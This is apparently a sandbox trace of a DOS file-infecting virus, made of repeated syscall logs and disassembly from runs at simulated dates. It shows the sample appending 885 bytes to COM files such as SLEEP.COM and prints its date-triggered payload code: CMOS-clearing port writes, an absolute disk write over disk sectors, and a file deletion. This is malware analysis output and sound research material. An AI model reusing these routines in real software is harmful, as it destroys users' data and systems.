2018-12-25T12:41:55.132980471Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.140399483Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.14766137Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.150009629Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.151682837Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.154519434Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.156429218Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.159888754Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.169334102Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.178822869Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.182751967Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.189886287Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.1968258Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.198755908Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.20023145Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.202964188Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.2050722Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.207875534Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.221036698Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.230517068Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.233684483Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.245709254Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.253895881Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.255691465Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.257317312Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.261810505Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.264052002Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.267129399Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.277271949Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.286815683Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.290133446Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.297855268Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.304483804Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.306096173Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.307337987Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.309694065Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.311189539Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.313195408Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.31987458Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.326136761Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:55.327117913Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:55.330061561Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:55.33249215Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:55.334831046Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:55.278114186Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:55.280977263Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:55.282811675Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:55.284483208Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:55.291933121Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:55.299996736Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:55.307323064Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:55.309230201Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:55.311526559Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:55.314465111Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:55.315870183Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:55.321203878Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:55.338879565Z 62 PC: 12dab | Close file
2018-12-25T12:41:55.351731893Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.355532651Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.36278943Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.369987805Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.372532367Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.373997723Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.377057052Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.380529389Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.383598172Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.392719302Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.402186671Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.404752672Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.409933338Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.414871182Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.418671329Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.420146808Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.422248834Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.424743214Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.426626314Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.433715089Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.443418767Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.446382196Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.453673196Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.461399164Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.462985813Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.464583377Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.469031546Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.471230208Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.474275491Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.484113726Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.495349727Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.498336105Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.506565497Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.514960367Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.525879045Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.527602186Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.531417678Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.533468728Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.536763859Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.547559765Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.557407876Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:55.558775451Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:55.561863905Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:55.565321122Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:55.567886881Z 19 PC: 12b55 | Delete file
2018-12-25T12:41:55.575263511Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:55.244366036Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:55.246260452Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:55.253835414Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:55.254940107Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:55.261700592Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:55.268639554Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:55.274802507Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:55.276425842Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:55.278551521Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:55.281391895Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:55.282940374Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:55.285935226Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:55.300715361Z 62 PC: 12dab | Close file
2018-12-25T12:41:55.308732677Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.312260982Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.318637791Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.329662493Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.336931Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.339003869Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.349251778Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.351342108Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.354229359Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.366565844Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.388751574Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.392283219Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.398789417Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.405545518Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.407610193Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.409163674Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.412058175Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.41468547Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.417422328Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.425785465Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.434948912Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.437751865Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.444337712Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.451388541Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.452992701Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.454569418Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.458174283Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.459777884Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.46231522Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.471648696Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.479917999Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.482447775Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.489662443Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.496034612Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.497744453Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.50010504Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.503195154Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.504889853Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.507593653Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.516892224Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.525096529Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:55.526513151Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:55.529910536Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:55.532351601Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:55.53478958Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:55.300587451Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:55.301909984Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:55.303402593Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:55.304760748Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:55.31253305Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:55.32126209Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:55.328389002Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:55.329892086Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:55.332272224Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:55.335317436Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:55.336783124Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:55.341584547Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:55.365034146Z 62 PC: 12dab | Close file
2018-12-25T12:41:55.375261167Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.378436699Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.386606584Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.394597418Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.396018501Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.398082177Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.399995771Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.401587824Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.40489688Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.414930184Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.424002813Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.427544013Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.435837587Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.443221594Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.44575581Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.447268854Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.450098318Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.452181154Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.455615517Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.465088565Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.480142547Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.483035753Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.490152821Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.497587043Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.499142071Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.502796116Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.515486973Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.517350776Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.519920253Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.529446456Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.538588314Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.541381813Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.548862477Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.556318654Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.557887872Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.559322482Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.562685783Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.564164854Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.56683728Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.576422772Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.58582072Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:55.588336017Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:55.591544757Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:55.593999331Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:55.596444559Z 19 PC: 12b55 | Delete file
2018-12-25T12:41:55.603638177Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":14,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:55.306195111Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:55.307842074Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:55.30972276Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:55.311366287Z 78 PC: 12ad1 | Find first file
